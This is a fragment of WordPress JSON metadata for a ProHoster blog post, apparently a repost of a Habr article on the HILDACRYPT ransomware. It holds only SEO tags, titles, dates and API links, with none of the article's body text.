\u0430\u043d\u0442\u0438\u0432\u0438\u0440\u0443\u0441\u043d\u044b\u043c \u0440\u0435\u0448\u0435\u043d\u0438\u044f\u043c | ProHoster\" \/>\n\t\t<meta property=\"og:description\" content=\"\u041f\u0440\u0438\u0432\u0435\u0442, \u0425\u0430\u0431\u0440! \u0418 \u0441\u043d\u043e\u0432\u0430 \u043c\u044b \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u043c \u043e \u0441\u0432\u0435\u0436\u0438\u0445 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e \u0438\u0437 \u043a\u0430\u0442\u0435\u0433\u043e\u0440\u0438\u0438 Ransomware.\" \/>\n\t\t<meta property=\"og:url\" content=\"https:\/\/prohoster.info\/en\/blog\/administrirovanie\/hildacrypt-novaya-programma-vymogatel-nanosit-udar-po-sistemam-rezervnogo-kopirovaniya-i-antivirusnym-resheniyam\" \/>\n\t\t<meta property=\"og:image\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:secure_url\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:width\" content=\"350\" \/>\n\t\t<meta property=\"og:image:height\" content=\"350\" \/>\n\t\t<meta property=\"article:published_time\" content=\"2019-11-04T21:00:00+00:00\" \/>\n\t\t<meta property=\"article:modified_time\" content=\"2020-02-18T10:59:57+00:00\" \/>\n\t\t<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<!-- All in One SEO -->\n\n","aioseo_head_json":{"title":"\ud83e\udd47HILDACRYPT: the new ransomware targets backup systems and antivirus solutions | ProHoster","description":"Hello, Habr! Once again, we are discussing the latest versions of malware in the Ransomware category.","canonical_url":"https:\/\/prohoster.info\/en\/blog\/administrirovanie\/hildacrypt-novaya-programma-vymogatel-nanosit-udar-po-sistemam-rezervnogo-kopirovaniya-i-antivirusnym-resheniyam","robots":"max-image-preview:large","keywords":"","webmasterTools":{"miscellaneous":""},"schema":null,"og:locale":"en_US","og:site_name":"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b","og:type":"article","og:title":"\ud83e\udd47HILDACRYPT: \u043d\u043e\u0432\u0430\u044f \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0430-\u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044c \u043d\u0430\u043d\u043e\u0441\u0438\u0442 \u0443\u0434\u0430\u0440 \u043f\u043e \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u043c \u0440\u0435\u0437\u0435\u0440\u0432\u043d\u043e\u0433\u043e \u043a\u043e\u043f\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0438 \u0430\u043d\u0442\u0438\u0432\u0438\u0440\u0443\u0441\u043d\u044b\u043c \u0440\u0435\u0448\u0435\u043d\u0438\u044f\u043c | ProHoster","og:description":"\u041f\u0440\u0438\u0432\u0435\u0442, \u0425\u0430\u0431\u0440! \u0418 \u0441\u043d\u043e\u0432\u0430 \u043c\u044b \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u043c \u043e \u0441\u0432\u0435\u0436\u0438\u0445 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e \u0438\u0437 \u043a\u0430\u0442\u0435\u0433\u043e\u0440\u0438\u0438 Ransomware.","og:url":"https:\/\/prohoster.info\/en\/blog\/administrirovanie\/hildacrypt-novaya-programma-vymogatel-nanosit-udar-po-sistemam-rezervnogo-kopirovaniya-i-antivirusnym-resheniyam","og:image":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:secure_url":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:width":350,"og:image:height":350,"article:published_time":"2019-11-04T21:00:00+00:00","article:modified_time":"2020-02-18T10:59:57+00:00","article:publisher":"https:\/\/www.facebook.com\/prohoster","article:author":"https:\/\/www.facebook.com\/prohoster"},"aioseo_meta_data":{"post_id":"52277","title":null,"description":null,"keywords":null,"keyphrases":null,"primary_term":null,"canonical_url":null,"og_title":null,"og_description":null,"og_object_type":"default","og_image_type":"default","og_image_url":null,"og_image_width":null,"og_image_height":null,"og_image_custom_url":null,"og_image_custom_fields":null,"og_video":null,"og_custom_url":null,"og_article_section":null,"og_article_tags":null,"twitter_use_og":false,"twitter_card":"default","twitter_image_type":"default","twitter_image_url":null,"twitter_image_custom_url":null,"twitter_image_custom_fields":null,"twitter_title":null,"twitter_description":null,"schema":{"blockGraphs":[],"customGraphs":[],"default":{"data":{"Article":[],"Course":[],"Dataset":[],"FAQPage":[],"Movie":[],"Person":[],"Product":[],"ProductReview":[],"Car":[],"Recipe":[],"Service":[],"SoftwareApplication":[],"WebPage":[]},"graphName":"","isEnabled":true},"graphs":[]},"schema_type":null,"schema_type_options":null,"pillar_content":false,"robots_default":true,"robots_noindex":false,"robots_noarchive":false,"robots_nosnippet":false,"robots_nofollow":false,"robots_noimageindex":false,"robots_noodp":false,"robots_notranslate":false,"robots_max_snippet":null,"robots_max_videopreview":null,"robots_max_imagepreview":"large","priority":null,"frequency":null,"local_seo":null,"seo_analyzer_scan_date":"2026-01-24 03:06:20","breadcrumb_settings":null,"limit_modified_date":false,"reviewed_by":null,"ai":null,"created":"2021-02-28 17:13:20","updated":"2026-01-24 03:06:20","focus_keyword":null,"additional_keywords":null,"truseo_locale":null},"gt_translate_keys":[{"key":"link","format":"url"}],"_links":{"self":[{"href":"https:\/\/prohoster.info\/en\/wp-json\/wp\/v2\/posts\/52277","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/prohoster.info\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/prohoster.info\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/prohoster.info\/en\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/prohoster.info\/en\/wp-json\/wp\/v2\/comments?post=52277"}],"version-history":[{"count":0,"href":"https:\/\/prohoster.info\/en\/wp-json\/wp\/v2\/posts\/52277\/revisions"}],"wp:attachment":[{"href":"https:\/\/prohoster.info\/en\/wp-json\/wp\/v2\/media?parent=52277"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/prohoster.info\/en\/wp-json\/wp\/v2\/categories?post=52277"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/prohoster.info\/en\/wp-json\/wp\/v2\/tags?post=52277"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}